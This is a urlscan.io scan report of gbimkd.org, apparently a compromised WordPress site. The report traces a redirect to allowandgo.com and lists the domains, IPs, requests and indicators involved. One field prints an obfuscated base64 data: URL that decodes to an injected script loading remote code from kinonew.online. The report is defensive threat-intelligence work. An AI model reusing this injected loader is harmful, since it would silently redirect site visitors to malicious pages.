allowandgo.com Open in urlscan Pro
157.245.79.75 Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://gbimkd.org/
Effective URL:
https://allowandgo.com/?p=gvsdezbtgm5gi3bpgi4da
Submission: On December 29 via automatic, source urlhaus (December 29th 2020, 4:08:59 pm UTC)

Summary HTTP 17 Redirects Behaviour Indicators

Similar DOM Content API

Summary

This website contacted 5 IPs in 3 countries across 4 domains to perform 17 HTTP transactions. The main IP is 157.245.79.75, located in United States and belongs to DIGITALOCEAN-ASN, US. The main domain is allowandgo.com.
TLS certificate: Issued by Let's Encrypt Authority X3 on October 31st 2020. Valid for: 3 months.

This is the only time allowandgo.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

	IP Address		AS Autonomous System
1 10	103.43.44.47 103.43.44.47		58397 (INFINYS-A...) (INFINYS-AS-ID PT Infinys System Indonesia)
2	2a00:1450:400... 2a00:1450:4001:802::200a		15169 (GOOGLE) (GOOGLE)
1	2606:4700:303... 2606:4700:3035::ac43:b06e		13335 (CLOUDFLAR...) (CLOUDFLARENET)
1	157.245.79.75 157.245.79.75		14061 (DIGITALOC...) (DIGITALOCEAN-ASN)
17	5

10 103.43.44.47 (Indonesia) 1 redirects

ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID)

gbimkd.org	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a00:1450:4001:802::200a (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

fonts.googleapis.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2606:4700:3035::ac43:b06e (United States)

ASN13335 (CLOUDFLARENET, US)

kinonew.online	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 157.245.79.75 (United States)

ASN14061 (DIGITALOCEAN-ASN, US)

allowandgo.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
10	gbimkd.org 1 redirects gbimkd.org	626 KB
2	googleapis.com fonts.googleapis.com	2 KB
1	allowandgo.com allowandgo.com	19 KB
1	kinonew.online kinonew.online	1 KB
17	4

	Domain	Requested by
10	gbimkd.org	1 redirects gbimkd.org
2	fonts.googleapis.com	gbimkd.org
1	allowandgo.com	kinonew.online
1	kinonew.online	text
17	4

This site contains no links.

Subject Issuer	Validity	Valid
cpcontacts.gbimkd.org R3	`2020-12-08` - `2021-03-08`	3 months	crt.sh
upload.video.google.com GTS CA 1O1	`2020-11-10` - `2021-02-02`	3 months	crt.sh
sni.cloudflaressl.com Cloudflare Inc ECC CA-3	`2020-08-09` - `2021-08-09`	a year	crt.sh
9.allowandgo.com Let's Encrypt Authority X3	`2020-10-31` - `2021-01-29`	3 months	crt.sh

This page contains 1 frames:

Primary Page: https://allowandgo.com/?p=gvsdezbtgm5gi3bpgi4da
Frame ID: E0273897BA52011F1044EA87ED25E4C6
Requests: 18 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page URL History Show full URLs

http://gbimkd.org/ HTTP 301
https://gbimkd.org/ Page URL
https://allowandgo.com/?p=gvsdezbtgm5gi3bpgi4da Page URL

Detected technologies

WordPress (CMS) Expand

Overall confidence: 100%
Detected patterns

headers link /rel="https:\/\/api\.w\.org\/"/i

PHP (Programming Languages) Expand

Overall confidence: 100%
Detected patterns

headers link /rel="https:\/\/api\.w\.org\/"/i

MySQL (Databases) Expand

Overall confidence: 100%
Detected patterns

headers link /rel="https:\/\/api\.w\.org\/"/i

OpenSSL (Web Server Extensions) Expand

Overall confidence: 100%
Detected patterns

headers server /OpenSSL(?:\/([\d.]+[a-z]?))?/i

Apache (Web Servers) Expand

Overall confidence: 100%
Detected patterns

headers server /(?:Apache(?:$|\/([\d.]+)|[^/-])|(?:^|\b)HTTPD)/i

Page Statistics

17
Requests

76 %
HTTPS

50 %
IPv6

4
Domains

4
Subdomains

5
IPs

3
Countries

647 kB
Transfer

730 kB
Size

1
Cookies

0 Outgoing links

These are links going to different origins than the main page.

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://gbimkd.org/ HTTP 301
https://gbimkd.org/ Page URL
https://allowandgo.com/?p=gvsdezbtgm5gi3bpgi4da Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 0

http://gbimkd.org/ HTTP 301
https://gbimkd.org/

17 HTTP transactions
1 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H/1.1

200
OK

/ Show response
gbimkd.org/
Redirect Chain

http://gbimkd.org/
https://gbimkd.org/

21 KB
22 KB

2466ms
1907ms

Document
text/html

103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 / PHP/5.6.40
Resource Hash: 50f687e6be904be261deb24597c0d94df33e7db2e15ea6f0b3a331a4d8b84e30

Request headers

Host: gbimkd.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:36 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
X-Powered-By: PHP/5.6.40
X-Pingback: https://gbimkd.org/xmlrpc.php
Link: <https://gbimkd.org/wp-json/>; rel="https://api.w.org/", <https://gbimkd.org/>; rel=shortlink
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Redirect headers

Date: Tue, 29 Dec 2020 16:08:33 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
X-Powered-By: PHP/5.6.40
X-Pingback: http://gbimkd.org/xmlrpc.php
Location: https://gbimkd.org/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

GET
H2 200 css
fonts.googleapis.com/ 21 KB
1 KB 16ms
15ms Stylesheet
text/css 2a00:1450:4001:802::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,latin-ext

Requested by

Host: gbimkd.org
URL: https://gbimkd.org/

Protocol

H2

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:802::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

4956068b2f2c2f14c6dd7fb409b7e5a22ab4a41b45c9ad683bc0f77c5853ffba

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Tue, 29 Dec 2020 15:13:40 GMT
server: ESF
date: Tue, 29 Dec 2020 16:08:38 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Tue, 29 Dec 2020 16:08:38 GMT

GET
H/1.1 200
OK style.css
gbimkd.org/wp-content/themes/Divi/ 447 KB
447 KB 282ms
275ms Stylesheet
text/css 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-content/themes/Divi/style.css?ver=3.3.1
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: bdfffffe2952d756d3eee07599488585e93d2244b1525348c08b3647726a4f70

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:38 GMT
Last-Modified: Sat, 19 May 2018 13:44:00 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c811fc-6fb00-56c8f42d20597"
Content-Type: text/css
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=99
Content-Length: 457472

GET
H2 200 css
fonts.googleapis.com/ 3 KB
541 B 16ms
15ms Stylesheet
text/css 2a00:1450:4001:802::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Chathura%3A100%2C300%2Cregular%2C700%2C800&ver=4.9.16

Requested by

Host: gbimkd.org
URL: https://gbimkd.org/

Protocol

H2

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:802::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

7159d3fea9268ef4afe354bda3b3e91750ed4452b7bea6faf031c375e5455f9c

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Tue, 29 Dec 2020 16:08:38 GMT
server: ESF
date: Tue, 29 Dec 2020 16:08:38 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Tue, 29 Dec 2020 16:08:38 GMT

GET
H/1.1 200
OK dashicons.min.css
gbimkd.org/wp-includes/css/ 45 KB
46 KB 998ms
379ms Stylesheet
text/css 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-includes/css/dashicons.min.css?ver=4.9.16
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: d0df2ff25fded9e43a0cfa5159393d4482725bfb390e8ca94f34da85b5304117

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:38 GMT
Last-Modified: Sat, 19 Aug 2017 13:10:48 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c80e56-b518-5571af95de600"
Content-Type: text/css
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Content-Length: 46360

GET
H/1.1 200
OK jquery.js Show response
gbimkd.org/wp-includes/js/jquery/ 95 KB
95 KB 1732ms
1108ms Script
application/javascript 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-includes/js/jquery/jquery.js?ver=1.12.4
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: cf34e1b87bbfd9d9b185dec994924a496e279d8dc9387ad8d35bc0110134c4d3

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:38 GMT
Last-Modified: Thu, 05 Sep 2019 07:19:39 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c80f58-17a6a-591c9250e302b"
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Content-Length: 96874

GET
H/1.1 200
OK jquery-migrate.min.js Show response
gbimkd.org/wp-includes/js/jquery/ 10 KB
10 KB 1749ms
1123ms Script
application/javascript 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: 48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:38 GMT
Last-Modified: Thu, 19 May 2016 23:11:28 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c80f52-2748-5333a180a4800"
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Content-Length: 10056

GET wp-emoji-release.min.js
gbimkd.org/wp-includes/js/ 0
0

GET
H/1.1 200
OK et-core-unified-160874382848.min.css
gbimkd.org/wp-content/cache/et/71/ 3 KB
3 KB 2060ms
1463ms Stylesheet
text/css 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-content/cache/et/71/et-core-unified-160874382848.min.css
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: 24855a26ef2a7b774218fe56f75789577ec551398c8f4a7f16efd6a785368dcc

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:38 GMT
Last-Modified: Wed, 23 Dec 2020 17:17:09 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c8418d-a89-5b724dc7d19f0"
Content-Type: text/css
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Content-Length: 2697

GET download-1.png
gbimkd.org/wp-content/uploads/2018/04/ 0
0

GET list-mkd.jpg
gbimkd.org/wp-content/uploads/2018/05/ 0
0

GET
H/1.1 200
OK comment-reply.min.js Show response
gbimkd.org/wp-includes/js/ 1 KB
1 KB 273ms
273ms Script
application/javascript 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-includes/js/comment-reply.min.js?ver=4.9.16
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash: 1b1ca0f15010e0124bd4ca481404643c88f7eda1b276e9554d0ed83fb45b7e30

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:40 GMT
Last-Modified: Wed, 18 Nov 2015 12:15:28 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c80f2b-436-524cf990ab800"
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=99
Content-Length: 1078

GET
H/1.1 200
OK custom.min.js
gbimkd.org/wp-content/themes/Divi/js/ 64 KB
0 273ms
273ms Script
application/javascript 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-content/themes/Divi/js/custom.min.js?ver=3.3.1
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:40 GMT
Last-Modified: Sat, 19 May 2018 13:44:37 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c8121a-3cfb9-56c8f44fdd519"
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=98
Content-Length: 249785

GET
H/1.1 200
OK common.js
gbimkd.org/wp-content/themes/Divi/core/admin/js/ 1 KB
2 KB 275ms
275ms Script
application/javascript 103.43.44.47
INFINYS-AS-ID PT ...

General

Check archive.org

Show headers Download Go to

Full URL: https://gbimkd.org/wp-content/themes/Divi/core/admin/js/common.js?ver=3.3.1
Requested by: Host: gbimkd.org
URL: https://gbimkd.org/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 103.43.44.47 , Indonesia, ASN58397 (INFINYS-AS-ID PT Infinys System Indonesia, ID),
Reverse DNS
Software: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4 /
Resource Hash

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Date: Tue, 29 Dec 2020 16:08:42 GMT
Last-Modified: Sat, 19 May 2018 13:48:00 GMT
Server: Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
ETag: "c81405-51d-56c8f512352b9"
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=99
Content-Length: 1309

GET wp-embed.min.js
gbimkd.org/wp-includes/js/ 0
0

GET
DATA 200
OK truncated Show response
/ 191 B
0 Script
text/javascript

General

Check archive.org

Show headers Download Go to

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: 153ecedb10a1cd3570c851b6deef26f88f89db565418d90956b5de1543f09b50

Request headers

Referer
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

Response headers

Content-Type: text/javascript

GET
H2 200 JsVkJw
kinonew.online/ 189 B
1 KB 210ms
173ms Script
application/javascript 2606:4700:3035::ac43:b06e
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL

https://kinonew.online/JsVkJw

Requested by

Host: text
URL: data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=

Protocol

H2

Security

TLS 1.3, , AES_128_GCM

Server

2606:4700:3035::ac43:b06e , United States, ASN13335 (CLOUDFLARENET, US),

Reverse DNS

Software

cloudflare /

Resource Hash

Security Headers

Name	Value
X-Content-Type-Options	nosniff

Request headers

Referer: https://gbimkd.org/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"

Response headers

pragma: no-cache
date: Tue, 29 Dec 2020 16:08:42 GMT
content-encoding: br
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
last-modified: Tue, 29 Dec 2020 16:25:04 GMT
server: cloudflare
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
nel: {"report_to":"cf-nel","max_age":604800}
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vhmCd%2BVY7GZX6I3MddPS%2B4NkLcywyhFWmihsolnwRe9YaNdzWAv9lfuK80uu%2F72KQwNj6neOWXueTfnKVNHPcMG0RPAENpoqei1hEgy2lULlCfmnnHysahOAEA%3D%3D"}],"group":"cf-nel","max_age":604800}
content-type: application/javascript
cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
cf-ray: 6094c8002e1e9766-FRA
cf-request-id: 0750db541b00009766b9037000000001
expires: 0

GET
H2 200 Primary Request / Show response
allowandgo.com/ 18 KB
19 KB 102ms
34ms Document
text/html 157.245.79.75
DIGITALOCEAN-ASN

General

Check archive.org

Show headers Download Go to

Full URL

https://allowandgo.com/?p=gvsdezbtgm5gi3bpgi4da

Requested by

Host: kinonew.online
URL: https://kinonew.online/JsVkJw

Protocol

H2

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

157.245.79.75 , United States, ASN14061 (DIGITALOCEAN-ASN, US),

Reverse DNS

Software

nginx /

Resource Hash

8732f6b611d5f282be645ab183035af1de45a6a1085a76b5b18052aa505cc621

Security Headers

Name	Value
Content-Security-Policy	img-src https: data:; upgrade-insecure-requests
Strict-Transport-Security	max-age=31536000

Request headers

:method: GET
:authority: allowandgo.com
:scheme: https
:path: /?p=gvsdezbtgm5gi3bpgi4da
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://gbimkd.org/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Referer: https://gbimkd.org/

Response headers

server: nginx
date: Tue, 29 Dec 2020 16:08:42 GMT
content-type: text/html; charset=UTF-8
access-control-allow-origin: *
set-cookie: uuid=f5e75545-56c1-4465-ae55-898f9aea83b6; expires=Thu, 28-Jan-2021 16:08:42 GMT; Max-Age=2592000; path=/; domain=allowandgo.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain: gbimkd.org
URL: https://gbimkd.org/wp-includes/js/wp-emoji-release.min.js?ver=4.9.16

Domain: gbimkd.org
URL: https://gbimkd.org/wp-content/uploads/2018/04/download-1.png

Domain: gbimkd.org
URL: https://gbimkd.org/wp-content/uploads/2018/05/list-mkd.jpg

Domain: gbimkd.org
URL: https://gbimkd.org/wp-includes/js/wp-embed.min.js?ver=4.9.16

Verdicts & Comments Add Verdict or Comment

24 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| ontransitionrun object| ontransitionstart object| ontransitioncancel object| cookieStore function| showDirectoryPicker function| showOpenFilePicker function| showSaveFilePicker object| trustedTypes boolean| crossOriginIsolated boolean| guardEnabled boolean| isChrome function| compareVersion function| getLanguage object| rootElement boolean| canStart function| text function| textr function| disableHistory function| disableIncognito function| denied function| getWorkerRegistration function| SubS function| CheckS function| urlB64ToUint8Array

1 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

			Domain/Path	Expires	Name / Value
			.allowandgo.com/	1970-01-19 15:44:10	Name: uuid Value: f5e75545-56c1-4465-ae55-898f9aea83b6

1 Console Messages

A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.

Source	Level	URL Text
console-api	log	URL: https://gbimkd.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1(Line 2) Message: JQMIGRATE: Migrate is installed, version 1.4.1

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

allowandgo.com
fonts.googleapis.com
gbimkd.org
kinonew.online
gbimkd.org
103.43.44.47
157.245.79.75
2606:4700:3035::ac43:b06e
2a00:1450:4001:802::200a
153ecedb10a1cd3570c851b6deef26f88f89db565418d90956b5de1543f09b50
1b1ca0f15010e0124bd4ca481404643c88f7eda1b276e9554d0ed83fb45b7e30
24855a26ef2a7b774218fe56f75789577ec551398c8f4a7f16efd6a785368dcc
48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d
4956068b2f2c2f14c6dd7fb409b7e5a22ab4a41b45c9ad683bc0f77c5853ffba
50f687e6be904be261deb24597c0d94df33e7db2e15ea6f0b3a331a4d8b84e30
7159d3fea9268ef4afe354bda3b3e91750ed4452b7bea6faf031c375e5455f9c
8732f6b611d5f282be645ab183035af1de45a6a1085a76b5b18052aa505cc621
bdfffffe2952d756d3eee07599488585e93d2244b1525348c08b3647726a4f70
cf34e1b87bbfd9d9b185dec994924a496e279d8dc9387ad8d35bc0110134c4d3
d0df2ff25fded9e43a0cfa5159393d4482725bfb390e8ca94f34da85b5304117